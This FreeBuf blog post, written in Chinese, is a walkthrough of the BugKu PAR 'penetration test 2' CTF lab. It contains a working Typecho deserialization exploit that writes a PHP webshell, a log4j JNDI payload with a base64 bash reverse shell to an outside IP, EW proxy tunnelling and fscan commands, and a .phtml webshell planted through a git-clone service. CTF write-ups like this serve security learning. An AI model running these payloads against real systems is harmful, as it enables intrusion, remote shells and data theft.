freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

BugKu-PAR-渗透测试2
l1nyuan7 2023-04-18 20:47:04 155944
所属地 安徽省

BugKu-PAR-渗透测试2

注:这是在做完靶场几天后做的wp,环境都已经没有了,只能纯靠文字讲述,但基本思路都写出来了,按照这个思路做是没什么问题的

dirsearch扫描发现.git源码泄露

使用githack下载下来,查看文件发现是Typecho,Typecho存在一个反序列化漏洞可导致命令执行

payload

<?php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        $this->_params['screenName'] = "echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+|base64 -d > 2.php";
        $this->_filter[0] = 'system';
    }
}

class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    /** 定义ATOM 1.0类型 */
    const ATOM1 = 'ATOM 1.0';
    /** 定义RSS时间格式 */
    const DATE_RFC822 = 'r';
    /** 定义ATOM时间格式 */
    const DATE_W3CDTF = 'c';
    /** 定义行结束符 */
    const EOL = "\n";
    private $_type;
    private $_items = array();
    public $dateFormat;

    public function __construct()
    {
        $this->_type = self::RSS2;
        $item['link'] = '1';
        $item['title'] = '2';
        $item['date'] = 1507720298;
        $item['author'] = new Typecho_Request();
        $item['category'] = array(new Typecho_Request());

        $this->_items[0] = $item;
    }
}

$x = new Typecho_Feed();
$a = array(
    'host' => 'localhost',
    'user' => 'xxxxxx',
    'charset' => 'utf8',
    'port' => '3306',
    'database' => 'typecho',
    'adapter' => $x,
    'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($a)));
?>

base64写马,蚁剑连接在根目录发现flag,在web目录下还存在admin.ini.php文件,里面存放着数据库的账号和密码,使用蚁剑插件连接在数据库中发现flag

开始打内网,查看/etc/hosts确定下一目标地址

cat /etc/hosts

通过蚁剑上传ew搭建代理

kali执行:(在本地起了一个端口为1010的socks5代理)

./ew_for_linux64 -s rcsocks -l 1010 -e 7777

蚁剑执行:

./ew_for_linux64 -s rssocks -d kali地址 -e 8888

连接成功后,kali那边会回显ok

利用蚁剑上传fscan扫描内网并将结果保存到a.txt中

fscan -h 内网地址 > a.txt

扫到一个web站点,访问是一个登录框,点击登录时会在返回头中提示源码文件名

下载源码解压可以看到是log4j,那就很明显了就是打log4j

使用vps起一个jndi服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80OS4yMzQuNTYuMjAwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "49.234.56.200"

那段base64编码内网就是要执行的反弹shell命令,把反弹地址和端口换成自己的并开启监听

之后在那台存在log4j的靶机上执行

${jndi:rmi://119.91.32.206:1099/fv304f}

rmi://119.91.32.206:1099/fv304f要根据你的jndi服务来填写

执行成功后会弹回来一个shell是root权限,在起根目录和root目录下都存在flag文件,在根目录下还存在一个start.sh文件,查看该文件可以发现是把flag写到了js文件中,查看js文件得到flag

接着在这台log4j的机器上执行cat /etc/hosts寻找下一目标地址

cat /etc/hosts

也可以通过 ip add等方法查看ip地址

确定好下一目标地址之后,就要设置代理了,kali开启web服务

python3 -m http.server

将ew放到这个临时web目录下

在目标机器上使用wget下载ew

wget http://0.0.0.0:8000/ew_for_linux64

为了信息收集,在把fscan下载了

wget http://0.0.0.0:8000/fscan_amd64

接下来设置代理

kali执行:

./ew_for_linux64 -s rcsocks -l 1000 -e 8888

在本地的1000端口上起了个socks5代理

靶机执行:

./ew_for_linux64 -s rssocks -d kali地址 -e 8888

执行成功后kali那边会回显ok,此时代理已经搭建好,下面就利用fscan信息收集确定好攻击目标

./fscan_amd64 -h 目标地址段

扫到了192.168.1.3,火狐浏览器设置代理,此时的代理就不是第一个ew代理了,而是第二个也就是端口为1000的代理地址

访问192.168.1.3,开启了web服务,里面的功能就类似于你输入一个github仓库地址,他就会给你clone下来,然后你可以访问他clone后的文件

在clone仓库的过程中也会clone仓库中的文件,也不免可以猜到在仓库里放置一个一句话木马,在它clone后去访问,但是正常的.php后缀是不会执行,经过测试后发现.phtml是可以被执行的

在仓库中编写一个.phtml后缀的一句话木马文件,输入仓库地址,他clone后直接访问就getshell,在根目录发现flag

接下来还是一样的套路查看网卡信息,kali开启web服务,靶机下载fscan扫描,下载ew设置代理,需要注意的是代理地址记得要改变否则会被占用,就会代理搭建失败

fccan扫描

./fscan_amd64 -h 目标地址段

设置代理

kali执行:

./ew_for_linux64 -s rcsocks -l 1040 -e 9999

此时的代理端口就是1040

靶机执行

./ew_for_linux64 -s rssocks -d kali地址 -e 9999

最后两个flag给了两个提示分别是guest/,通过fscan扫描也可以发现内网有台主机开放了21ftp服务

账号密码都是guest,ls发现flag,get flag下载下得到第七个flag

切换到跟目录 cd /下载根目录中的最后一个flag

至此flag全部拿到!

# 漏洞 # 渗透测试 # web安全 # 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 l1nyuan7 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
l1nyuan7 LV.4
这家伙太懒了,还未填写个人描述!
  • 9 文章数
  • 3 关注者
NetLogon域内提权漏洞CVE-2020-1472
2023-03-14
内网渗透信息收集总结
2023-03-03
KB2871997补丁绕过
2023-02-28